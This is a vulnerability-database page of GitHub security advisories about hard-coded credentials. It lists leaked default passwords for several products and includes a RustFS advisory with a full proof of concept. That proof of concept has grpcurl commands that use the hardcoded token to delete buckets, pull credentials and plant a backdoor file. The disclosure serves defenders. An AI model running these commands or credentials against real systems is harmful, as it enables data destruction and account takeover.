CWE-798
Allowed-with-ReviewUse of Hard-coded Credentials
Abstraction: Base · Status: Draft
The product contains hard-coded credentials, such as a password or cryptographic key.
2178 vulnerabilities reference this CWE, most recent first.
GHSA-H7CC-6WQ3-9H7X
Vulnerability from github – Published: 2026-07-01 06:31 – Updated: 2026-07-09 06:31UltraVNC repeater through 1.8.2.2 initializes the HTTP administration server with a hardcoded default password. In repeater/webgui/settings.c:197, when settings2.txt is absent on first run the repeater writes the literal string "adminadmi2" as the admin password via strcpy_s(saved_password, 64, "adminadmi2"). The HTTP Basic-auth handler wi_decode_auth() checks this password without rate-limiting or lockout. Any remote attacker who can reach the repeater HTTP port (default TCP 80) can authenticate as administrator using the well-known default credential on a fresh or unmodified installation, gaining full control of the repeater configuration including allow/deny rules and session visibility.
{
"affected": [],
"aliases": [
"CVE-2026-7839"
],
"database_specific": {
"cwe_ids": [
"CWE-798"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-01T05:16:24Z",
"severity": "CRITICAL"
},
"details": "UltraVNC repeater through 1.8.2.2 initializes the HTTP administration server with a hardcoded default password. In repeater/webgui/settings.c:197, when settings2.txt is absent on first run the repeater writes the literal string \"adminadmi2\" as the admin password via strcpy_s(saved_password, 64, \"adminadmi2\"). The HTTP Basic-auth handler wi_decode_auth() checks this password without rate-limiting or lockout. Any remote attacker who can reach the repeater HTTP port (default TCP 80) can authenticate as administrator using the well-known default credential on a fresh or unmodified installation, gaining full control of the repeater configuration including allow/deny rules and session visibility.",
"id": "GHSA-h7cc-6wq3-9h7x",
"modified": "2026-07-09T06:31:59Z",
"published": "2026-07-01T06:31:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7839"
},
{
"type": "WEB",
"url": "https://github.com/ultravnc/UltraVNC"
},
{
"type": "WEB",
"url": "https://uvnc.com"
},
{
"type": "WEB",
"url": "https://www.securin.io/zero-days/cve-2026-7839-hardcoded-default-admin-password-adminadmi2-ultravnc-repeater"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-H7HV-3J2Q-QW9G
Vulnerability from github – Published: 2025-04-28 06:30 – Updated: 2025-04-28 18:30The Admin and Site Enhancements (ASE) WordPress plugin before 7.6.10 uses a hardcoded password in its Password Protection feature, allowing attacker to bypass the protection offered via a crafted request
{
"affected": [],
"aliases": [
"CVE-2024-13688"
],
"database_specific": {
"cwe_ids": [
"CWE-798"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-04-28T06:15:15Z",
"severity": "MODERATE"
},
"details": "The Admin and Site Enhancements (ASE) WordPress plugin before 7.6.10 uses a hardcoded password in its Password Protection feature, allowing attacker to bypass the protection offered via a crafted request",
"id": "GHSA-h7hv-3j2q-qw9g",
"modified": "2025-04-28T18:30:53Z",
"published": "2025-04-28T06:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13688"
},
{
"type": "WEB",
"url": "https://wpscan.com/vulnerability/19051d08-16b0-466c-976b-be7b076e8e92"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-H7M9-MJXP-HHHV
Vulnerability from github – Published: 2023-10-25 18:32 – Updated: 2023-11-01 15:33EisBaer Scada - CWE-321: Use of Hard-coded Cryptographic Key
{
"affected": [],
"aliases": [
"CVE-2023-42492"
],
"database_specific": {
"cwe_ids": [
"CWE-321",
"CWE-798"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-10-25T18:17:31Z",
"severity": "CRITICAL"
},
"details": " EisBaer Scada - CWE-321: Use of Hard-coded Cryptographic Key",
"id": "GHSA-h7m9-mjxp-hhhv",
"modified": "2023-11-01T15:33:29Z",
"published": "2023-10-25T18:32:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42492"
},
{
"type": "WEB",
"url": "https://www.gov.il/en/Departments/faq/cve_advisories"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-H849-H67F-XM4X
Vulnerability from github – Published: 2022-05-13 01:10 – Updated: 2022-05-13 01:10D-Link DIR-620 devices, with a certain Rostelekom variant of firmware 1.0.37, have a hardcoded rostel account, which makes it easier for remote attackers to obtain access via a TELNET session.
{
"affected": [],
"aliases": [
"CVE-2018-6210"
],
"database_specific": {
"cwe_ids": [
"CWE-798"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-06-19T19:29:00Z",
"severity": "CRITICAL"
},
"details": "D-Link DIR-620 devices, with a certain Rostelekom variant of firmware 1.0.37, have a hardcoded rostel account, which makes it easier for remote attackers to obtain access via a TELNET session.",
"id": "GHSA-h849-h67f-xm4x",
"modified": "2022-05-13T01:10:36Z",
"published": "2022-05-13T01:10:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-6210"
},
{
"type": "WEB",
"url": "https://securelist.com/backdoors-in-d-links-backyard/85530"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-H852-6Q42-CM59
Vulnerability from github – Published: 2024-12-03 18:31 – Updated: 2024-12-03 18:31IBM Cognos Controller 11.0.0 and 11.0.1
contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data.
{
"affected": [],
"aliases": [
"CVE-2024-41777"
],
"database_specific": {
"cwe_ids": [
"CWE-798"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-12-03T18:15:14Z",
"severity": "HIGH"
},
"details": "IBM Cognos Controller 11.0.0 and 11.0.1 \n\n\n\n\n\n\n\n\n\ncontains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data.",
"id": "GHSA-h852-6q42-cm59",
"modified": "2024-12-03T18:31:04Z",
"published": "2024-12-03T18:31:04Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41777"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/7177220"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-H8PV-5J53-PM62
Vulnerability from github – Published: 2022-05-13 01:31 – Updated: 2022-05-13 01:31A vulnerability in the management web interface of Cisco Network Assurance Engine (NAE) could allow an unauthenticated, local attacker to gain unauthorized access or cause a Denial of Service (DoS) condition on the server. The vulnerability is due to a fault in the password management system of NAE. An attacker could exploit this vulnerability by authenticating with the default administrator password via the CLI of an affected server. A successful exploit could allow the attacker to view potentially sensitive information or bring the server down, causing a DoS condition. This vulnerability affects Cisco Network Assurance Engine (NAE) Release 3.0(1). The default password condition only affects new installations of Release 3.0(1).
{
"affected": [],
"aliases": [
"CVE-2019-1688"
],
"database_specific": {
"cwe_ids": [
"CWE-798"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-02-12T19:29:00Z",
"severity": "HIGH"
},
"details": "A vulnerability in the management web interface of Cisco Network Assurance Engine (NAE) could allow an unauthenticated, local attacker to gain unauthorized access or cause a Denial of Service (DoS) condition on the server. The vulnerability is due to a fault in the password management system of NAE. An attacker could exploit this vulnerability by authenticating with the default administrator password via the CLI of an affected server. A successful exploit could allow the attacker to view potentially sensitive information or bring the server down, causing a DoS condition. This vulnerability affects Cisco Network Assurance Engine (NAE) Release 3.0(1). The default password condition only affects new installations of Release 3.0(1).",
"id": "GHSA-h8pv-5j53-pm62",
"modified": "2022-05-13T01:31:24Z",
"published": "2022-05-13T01:31:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1688"
},
{
"type": "WEB",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190212-nae-dos"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/107010"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-H8WJ-7M8M-J6C8
Vulnerability from github – Published: 2022-05-13 01:05 – Updated: 2022-05-13 01:05EMC ViPR SRM, EMC Storage M&R, EMC VNX M&R, EMC M&R for SAS Solution Packs (EMC ViPR SRM prior to 4.1, EMC Storage M&R prior to 4.1, EMC VNX M&R all versions, EMC M&R (Watch4Net) for SAS Solution Packs all versions) contain undocumented accounts with default passwords for Webservice Gateway and RMI JMX components. A remote attacker with the knowledge of the default password may potentially use these accounts to run arbitrary web service and remote procedure calls on the affected system.
{
"affected": [],
"aliases": [
"CVE-2017-8011"
],
"database_specific": {
"cwe_ids": [
"CWE-798"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-07-17T14:29:00Z",
"severity": "CRITICAL"
},
"details": "EMC ViPR SRM, EMC Storage M\u0026R, EMC VNX M\u0026R, EMC M\u0026R for SAS Solution Packs (EMC ViPR SRM prior to 4.1, EMC Storage M\u0026R prior to 4.1, EMC VNX M\u0026R all versions, EMC M\u0026R (Watch4Net) for SAS Solution Packs all versions) contain undocumented accounts with default passwords for Webservice Gateway and RMI JMX components. A remote attacker with the knowledge of the default password may potentially use these accounts to run arbitrary web service and remote procedure calls on the affected system.",
"id": "GHSA-h8wj-7m8m-j6c8",
"modified": "2022-05-13T01:05:59Z",
"published": "2022-05-13T01:05:59Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-8011"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2017/Jul/21"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/99555"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1038905"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-H94V-C346-344V
Vulnerability from github – Published: 2022-05-24 17:41 – Updated: 2022-05-24 17:41An issue was discovered on FiberHome HG6245D devices through RP2613. The web daemon contains the hardcoded admin / aisadmin credentials for an ISP.
{
"affected": [],
"aliases": [
"CVE-2021-27164"
],
"database_specific": {
"cwe_ids": [
"CWE-798"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-02-10T19:15:00Z",
"severity": "CRITICAL"
},
"details": "An issue was discovered on FiberHome HG6245D devices through RP2613. The web daemon contains the hardcoded admin / aisadmin credentials for an ISP.",
"id": "GHSA-h94v-c346-344v",
"modified": "2022-05-24T17:41:51Z",
"published": "2022-05-24T17:41:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27164"
},
{
"type": "WEB",
"url": "https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html#httpd-hardcoded-credentials"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-H956-RH7X-PPGJ
Vulnerability from github – Published: 2025-12-30 23:06 – Updated: 2026-01-07 15:22Vulnerability Overview
Description
RustFS implements gRPC authentication using a hardcoded static token "rustfs rpc" that is:
1. Publicly exposed in the source code repository
2. Hardcoded on both client and server sides
3. Non-configurable with no mechanism for token rotation
4. Universally valid across all RustFS deployments
Any attacker with network access to the gRPC port can authenticate using this publicly known token and execute privileged operations including data destruction, policy manipulation, and cluster configuration changes.
CVSS 3.1 Score
Score: 9.8 (Critical)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- Attack Vector (AV): Network - Exploitable remotely
- Attack Complexity (AC): Low - No special conditions required
- Privileges Required (PR): None - No authentication needed (bypassed)
- User Interaction (UI): None - Fully automated exploitation
- Scope (S): Unchanged - Impact contained to vulnerable component
- Confidentiality (C): High - Complete data disclosure
- Integrity (I): High - Complete data modification capability
- Availability (A): High - Complete service disruption capability
Vulnerable Code Analysis
Server-Side Authentication (rustfs/src/server/http.rs:679-686)
#[allow(clippy::result_large_err)]
fn check_auth(req: Request<()>) -> std::result::Result<Request<()>, Status> {
let token: MetadataValue<_> = "rustfs rpc".parse().unwrap(); // ⚠️ HARDCODED!
match req.metadata().get("authorization") {
Some(t) if token == t => Ok(req),
_ => Err(Status::unauthenticated("No valid auth token")),
}
}
Issues: - Static token hardcoded as string literal - No configuration mechanism (environment variable, file, etc.) - Token visible in public GitHub repository - Identical across all installations
Client-Side Authentication (crates/protos/src/lib.rs:153-174)
pub async fn node_service_time_out_client(
addr: &String,
) -> Result<NodeServiceClient<...>, Box<dyn Error>> {
let token: MetadataValue<_> = "rustfs rpc".parse()?; // ⚠️ SAME HARDCODED TOKEN!
// ...
Ok(NodeServiceClient::with_interceptor(
channel,
Box::new(move |mut req: Request<()>| {
req.metadata_mut().insert("authorization", token.clone());
Ok(req)
}),
))
}
Issues: - Client uses identical hardcoded token - No secure token distribution mechanism - Token cannot be rotated without code changes
Service Integration (rustfs/src/server/http.rs:520-521)
let rpc_service = NodeServiceServer::with_interceptor(make_server(), check_auth);
let service = hybrid(s3_service, rpc_service);
The check_auth interceptor is applied to all gRPC services via NodeServiceServer::with_interceptor, protecting all 50+ gRPC methods in node.proto with the same weak authentication.
Reproduction Steps
Environment Setup
Test Environment:
- RustFS Server: localhost:9000 (HTTP + gRPC hybrid service)
- RustFS Console: localhost:9001
- Container: rustfs/rustfs:latest (Docker Compose deployment)
- Default credentials: rustfsadmin/rustfsadmin
Tools Required:
- grpcurl v1.9.3+ (gRPC command-line client)
- RustFS proto files: crates/protos/src/node.proto
Step 1: Verify Authentication is Enforced
Test 1.1: Request without authentication token
$ grpcurl -plaintext \
-import-path /private/tmp/rustfs/crates/protos/src \
-proto node.proto \
-d '{}' \
localhost:9000 node_service.NodeService/Ping
Expected Result: ✅ Authentication failure
ERROR:
Code: Unauthenticated
Message: No valid auth token
Test 1.2: Request with incorrect token
$ grpcurl -plaintext \
-H 'authorization: wrong-token-12345' \
-import-path /private/tmp/rustfs/crates/protos/src \
-proto node.proto \
-d '{}' \
localhost:9000 node_service.NodeService/Ping
Expected Result: ✅ Authentication failure
ERROR:
Code: Unauthenticated
Message: No valid auth token
Conclusion: Authentication is properly enforced - unauthorized requests are rejected.
Step 2: Extract Hardcoded Token from Source Code
Public Source Code Analysis:
$ git clone https://github.com/rustfs/rustfs.git
$ cd rustfs
$ grep -rn '"rustfs rpc"' --include='*.rs'
Result: ✅ Token found in public source code
rustfs/src/server/http.rs:680: let token: MetadataValue<_> = "rustfs rpc".parse().unwrap();
crates/protos/src/lib.rs:153: let token: MetadataValue<_> = "rustfs rpc".parse()?;
Extracted Token: rustfs rpc
Step 3: Exploit - Authenticate Using Hardcoded Token
Test 3.1: Successful authentication with hardcoded token
$ grpcurl -plaintext \
-H 'authorization: rustfs rpc' \
-import-path /private/tmp/rustfs/crates/protos/src \
-proto node.proto \
-d '{}' \
localhost:9000 node_service.NodeService/Ping
Result: 🔓 AUTHENTICATION BYPASSED
{
"version": "1",
"body": "DAAAAAAABgAIAAQABgAAAAQAAAANAAAAaGVsbG8sIGNhbGxlcgAAAA=="
}
Analysis: Server accepted the hardcoded token and returned a successful response. Authentication completely bypassed.
Step 4: Demonstrate Access to Sensitive Management APIs
Test 4.1: Server Configuration Disclosure
$ grpcurl -plaintext \
-H 'authorization: rustfs rpc' \
-import-path /private/tmp/rustfs/crates/protos/src \
-proto node.proto \
-d '{}' \
localhost:9000 node_service.NodeService/ServerInfo
Result: ✅ Complete server configuration disclosed
{
"success": true,
"serverProperties": "n6ZvbmxpbmWsMC4wLjAuMDo5MDAwoM0DhdkjMjAyNS0xMi0xOVQwNjo1NzoxOVpAMS4wLjAtYWxwaGEuNzaggawwLjAuMC4wOjkwMDCmb25saW5llNwAGq0vZGF0YS9ydXN0ZnMwwq0vZGF0YS9ydXN0ZnMwwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAANwAGq0vZGF0YS9ydXN0ZnMxwq0vZGF0YS9ydXN0ZnMxwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAdwAGq0vZGF0YS9ydXN0ZnMywq0vZGF0YS9ydXN0ZnMywsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAtwAGq0vZGF0YS9ydXN0ZnMzwq0vZGF0YS9ydXN0ZnMzwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAwGRAZUAAAAAAAAAoIA="
}
Analysis: - Server returned complete configuration including storage paths, endpoint addresses, version info - Binary data contains sensitive internal state (MessagePack encoded) - Information disclosure confirmed
Test 4.2: Disk Information Access
$ grpcurl -plaintext \
-H 'authorization: rustfs rpc' \
-import-path /private/tmp/rustfs/crates/protos/src \
-proto node.proto \
-d '{}' \
localhost:9000 node_service.NodeService/DiskInfo
Result: ✅ Authenticated request accepted (business logic error returned, not auth error)
{
"error": {
"code": 36,
"errorInfo": "io error can not find disk"
}
}
Analysis: - Request passed authentication (error is business logic, not authentication) - Proves attacker has authenticated access to sensitive system information APIs
Impact Analysis
Affected APIs
All 50+ gRPC methods in node_service.NodeService are vulnerable:
🔴 CRITICAL Impact - Data Destruction
DeleteBucket- Delete production bucketsDeleteVolume- Destroy entire storage volumesDeleteUser- Remove legitimate usersDeletePolicy- Remove access control policiesDeleteServiceAccount- Remove service accounts
🔴 CRITICAL Impact - Configuration Manipulation
ReloadSiteReplicationConfig- Corrupt cluster replicationSignalService- Control service lifecycleLoadPolicy- Modify access control policiesLoadPolicyMapping- Alter policy assignments
🟠 HIGH Impact - Unauthorized Data Access/Modification
ReadAll/ReadAt- Read arbitrary dataWriteAll/WriteStream- Inject malicious dataRenameFile/RenameData- Manipulate file systemUpdateMetadata/WriteMetadata- Corrupt metadata
🟠 HIGH Impact - Privilege Escalation
LoadUser- Access user credentialsLoadServiceAccount- Access service credentialsLoadGroup- Access group memberships
🟡 MEDIUM Impact - Information Disclosure
ServerInfo- Server configuration disclosureDiskInfo- Storage configuration disclosureGetMetrics- Performance metrics disclosureGetBucketStats- Bucket statistics disclosureLocalStorageInfo- Storage system informationListBucket- Bucket enumeration
🟡 MEDIUM Impact - Cluster Operations
MakeBucket- Unauthorized bucket creationHealBucket- Trigger repair operationsBackgroundHealStatus- Monitor internal operations
Attack Scenarios
Scenario 1: Data Destruction
# Enumerate all buckets
grpcurl -plaintext -H 'authorization: rustfs rpc' \
-d '{"options": "{}"}' \
localhost:9000 node_service.NodeService/ListBucket
# Delete critical production bucket
grpcurl -plaintext -H 'authorization: rustfs rpc' \
-d '{"bucket": "production-data"}' \
localhost:9000 node_service.NodeService/DeleteBucket
# Delete entire storage volume
grpcurl -plaintext -H 'authorization: rustfs rpc' \
-d '{"volume": "vol1"}' \
localhost:9000 node_service.NodeService/DeleteVolume
Impact: Complete data loss, business disruption
Scenario 2: Credential Harvesting
# Extract user credentials
grpcurl -plaintext -H 'authorization: rustfs rpc' \
-d '{"access_key": "admin"}' \
localhost:9000 node_service.NodeService/LoadUser
# Extract service account credentials
grpcurl -plaintext -H 'authorization: rustfs rpc' \
-d '{"access_key": "service-account"}' \
localhost:9000 node_service.NodeService/LoadServiceAccount
# Exfiltrate IAM policies
grpcurl -plaintext -H 'authorization: rustfs rpc' \
-d '{"name": "admin-policy"}' \
localhost:9000 node_service.NodeService/LoadPolicy
Impact: Complete IAM compromise, lateral movement
Scenario 3: Backdoor Installation
# Inject malicious data into system paths
grpcurl -plaintext -H 'authorization: rustfs rpc' \
-d '{"volume": "config", "path": "backdoor.sh", "buf": "..."}' \
localhost:9000 node_service.NodeService/WriteAll
# Modify system configuration
grpcurl -plaintext -H 'authorization: rustfs rpc' \
-d '{"bucket": "system", "path": ".rustfs.sys/config.json", "fi": "..."}' \
localhost:9000 node_service.NodeService/WriteMetadata
Impact: Persistent compromise, further exploitation
Scenario 4: Cluster Disruption
# Corrupt replication configuration
grpcurl -plaintext -H 'authorization: rustfs rpc' \
-d '{}' \
localhost:9000 node_service.NodeService/ReloadSiteReplicationConfig
# Force service restart/shutdown
grpcurl -plaintext -H 'authorization: rustfs rpc' \
-d '{"sig": 2}' \
localhost:9000 node_service.NodeService/SignalService
Impact: Distributed system failure, data inconsistency
Exploitation Preconditions
Required Conditions
✅ All conditions typically met in production deployments:
- Network Access: Attacker can reach gRPC port (9000/TCP)
- RustFS binds to
0.0.0.0by default (all interfaces) -
Commonly exposed for distributed node communication
-
Token Knowledge: Token is publicly known
- Available in public GitHub repository
- Identical across all RustFS installations
-
Cannot be changed without code modification
-
No Additional Security Controls:
- No mTLS/certificate-based authentication
- No IP whitelisting (typically)
- No VPN/network segmentation requirements
- No rate limiting on authentication attempts
Attack Complexity
Complexity: 🟢 TRIVIAL
- Single
grpcurlcommand with hardcoded token - No exploit development required
- No timing or race conditions
- No target-specific reconnaissance needed
- Fully automatable
- Works against any RustFS instance
Time to Exploit: < 1 minute
Security Impact
Confidentiality Impact: HIGH
- Complete Data Disclosure: All stored objects readable via
ReadAll/ReadAt - Credential Exposure: IAM users, service accounts, policies accessible
- Configuration Disclosure: Server, storage, cluster configuration leaked
- Metrics Exposure: Performance and usage metrics accessible
Integrity Impact: HIGH
- Data Modification: Arbitrary data injection via
WriteAll/WriteStream - Metadata Corruption: File metadata tampering via
WriteMetadata - Policy Manipulation: IAM policies modifiable via
LoadPolicy - Configuration Changes: Cluster replication config alterable
Availability Impact: HIGH
- Data Destruction: Buckets/volumes deletable via
DeleteBucket/DeleteVolume - Service Disruption: Service controllable via
SignalService - Cluster Degradation: Replication corruption via
ReloadSiteReplicationConfig - Resource Exhaustion: Arbitrary data writes, bucket creation
Compliance & Regulatory Impact
Standards Violated
PCI-DSS v4.0
- Requirement 6.5.3: Broken authentication
- Requirement 8.2: Strong authentication required
- Requirement 8.6: Multi-factor authentication required
OWASP Top 10 2021
- A07:2021 - Identification and Authentication Failures
- Use of hard-coded credentials
- Missing or ineffective authentication
CWE (Common Weakness Enumeration)
- CWE-798: Use of Hard-coded Credentials (Rank: 37/400)
- CWE-1391: Use of Weak Credentials
- CWE-287: Improper Authentication
NIST Cybersecurity Framework
- PR.AC-1: Access control mechanisms violated
- PR.AC-7: Authentication mechanisms insufficient
SOC 2 Type II
- CC6.1: Logical access controls inadequate
- CC6.6: Credential management controls missing
Legal & Business Impact
- Data Breach Notification: GDPR Art. 33, CCPA §1798.150
- Regulatory Fines: GDPR up to €20M or 4% annual revenue
- Customer Trust: Severe reputational damage
- Service Disruption: SLA violations, customer compensation
- Incident Response Costs: Forensics, remediation, legal fees
Proof of Concept
Automated POC Script
File: audit_analysis/poc_cve_2025_008_grpc_token_working.sh
Usage:
chmod +x poc_cve_2025_008_grpc_token_working.sh
./poc_cve_2025_008_grpc_token_working.sh [target_host:port]
Default Target: localhost:9000
POC Features
- ✅ Baseline Authentication Testing
- Verifies unauthenticated requests are rejected
-
Verifies incorrect tokens are rejected
-
✅ Exploit Demonstration
- Authenticates using hardcoded token
-
Calls
Pingservice successfully -
✅ Sensitive API Access
- Accesses
ServerInfo(configuration disclosure) - Accesses
DiskInfo(system information) -
Demonstrates authenticated access to management APIs
-
✅ Detailed Reporting
- Displays vulnerable code locations
- Lists all affected APIs (50+ methods)
- Provides CVSS scoring and impact analysis
- Includes remediation recommendations
POC Output Summary
[PHASE 1] Baseline Testing
✓ Without token: REJECTED (Unauthenticated)
✓ With wrong token: REJECTED (Unauthenticated)
[PHASE 2] Exploit
✓ With hardcoded token "rustfs rpc": ACCEPTED ✅
[PHASE 3] Sensitive API Access
✓ ServerInfo: SUCCESS - Configuration disclosed
✓ DiskInfo: SUCCESS - System information accessible
[RESULT] VULNERABILITY CONFIRMED
Acknowledgements
We would like to thank bilisheep from the Xmirror Security Team for discovering and responsibly reporting this vulnerability.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.0.0-alpha.77"
},
"package": {
"ecosystem": "crates.io",
"name": "rustfs"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0-alpha.13"
},
{
"fixed": "1.0.0-alpha.78"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-68926"
],
"database_specific": {
"cwe_ids": [
"CWE-287",
"CWE-798"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-30T23:06:15Z",
"nvd_published_at": "2025-12-30T17:15:43Z",
"severity": "CRITICAL"
},
"details": "## Vulnerability Overview\n\n### Description\n\nRustFS implements gRPC authentication using a hardcoded static token `\"rustfs rpc\"` that is:\n1. **Publicly exposed** in the source code repository\n2. **Hardcoded** on both client and server sides\n3. **Non-configurable** with no mechanism for token rotation\n4. **Universally valid** across all RustFS deployments\n\nAny attacker with network access to the gRPC port can authenticate using this publicly known token and execute privileged operations including data destruction, policy manipulation, and cluster configuration changes.\n\n### CVSS 3.1 Score\n\n**Score**: 9.8 (Critical)\n**Vector**: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`\n\n- **Attack Vector (AV)**: Network - Exploitable remotely\n- **Attack Complexity (AC)**: Low - No special conditions required\n- **Privileges Required (PR)**: None - No authentication needed (bypassed)\n- **User Interaction (UI)**: None - Fully automated exploitation\n- **Scope (S)**: Unchanged - Impact contained to vulnerable component\n- **Confidentiality (C)**: High - Complete data disclosure\n- **Integrity (I)**: High - Complete data modification capability\n- **Availability (A)**: High - Complete service disruption capability\n\n---\n\n## Vulnerable Code Analysis\n\n### Server-Side Authentication (rustfs/src/server/http.rs:679-686)\n\n```rust\n#[allow(clippy::result_large_err)]\nfn check_auth(req: Request\u003c()\u003e) -\u003e std::result::Result\u003cRequest\u003c()\u003e, Status\u003e {\n let token: MetadataValue\u003c_\u003e = \"rustfs rpc\".parse().unwrap(); // \u26a0\ufe0f HARDCODED!\n\n match req.metadata().get(\"authorization\") {\n Some(t) if token == t =\u003e Ok(req),\n _ =\u003e Err(Status::unauthenticated(\"No valid auth token\")),\n }\n}\n```\n\n**Issues**:\n- Static token hardcoded as string literal\n- No configuration mechanism (environment variable, file, etc.)\n- Token visible in public GitHub repository\n- Identical across all installations\n\n### Client-Side Authentication (crates/protos/src/lib.rs:153-174)\n\n```rust\npub async fn node_service_time_out_client(\n addr: \u0026String,\n) -\u003e Result\u003cNodeServiceClient\u003c...\u003e, Box\u003cdyn Error\u003e\u003e {\n let token: MetadataValue\u003c_\u003e = \"rustfs rpc\".parse()?; // \u26a0\ufe0f SAME HARDCODED TOKEN!\n\n // ...\n\n Ok(NodeServiceClient::with_interceptor(\n channel,\n Box::new(move |mut req: Request\u003c()\u003e| {\n req.metadata_mut().insert(\"authorization\", token.clone());\n Ok(req)\n }),\n ))\n}\n```\n\n**Issues**:\n- Client uses identical hardcoded token\n- No secure token distribution mechanism\n- Token cannot be rotated without code changes\n\n### Service Integration (rustfs/src/server/http.rs:520-521)\n\n```rust\nlet rpc_service = NodeServiceServer::with_interceptor(make_server(), check_auth);\nlet service = hybrid(s3_service, rpc_service);\n```\n\nThe `check_auth` interceptor is applied to all gRPC services via `NodeServiceServer::with_interceptor`, protecting **all 50+ gRPC methods** in `node.proto` with the same weak authentication.\n\n---\n\n## Reproduction Steps\n\n### Environment Setup\n\n**Test Environment**:\n- RustFS Server: `localhost:9000` (HTTP + gRPC hybrid service)\n- RustFS Console: `localhost:9001`\n- Container: `rustfs/rustfs:latest` (Docker Compose deployment)\n- Default credentials: `rustfsadmin/rustfsadmin`\n\n**Tools Required**:\n- `grpcurl` v1.9.3+ (gRPC command-line client)\n- RustFS proto files: `crates/protos/src/node.proto`\n\n### Step 1: Verify Authentication is Enforced\n\n**Test 1.1: Request without authentication token**\n\n```bash\n$ grpcurl -plaintext \\\n -import-path /private/tmp/rustfs/crates/protos/src \\\n -proto node.proto \\\n -d \u0027{}\u0027 \\\n localhost:9000 node_service.NodeService/Ping\n```\n\n**Expected Result**: \u2705 Authentication failure\n\n```\nERROR:\n Code: Unauthenticated\n Message: No valid auth token\n```\n\n**Test 1.2: Request with incorrect token**\n\n```bash\n$ grpcurl -plaintext \\\n -H \u0027authorization: wrong-token-12345\u0027 \\\n -import-path /private/tmp/rustfs/crates/protos/src \\\n -proto node.proto \\\n -d \u0027{}\u0027 \\\n localhost:9000 node_service.NodeService/Ping\n```\n\n**Expected Result**: \u2705 Authentication failure\n\n```\nERROR:\n Code: Unauthenticated\n Message: No valid auth token\n```\n\n**Conclusion**: 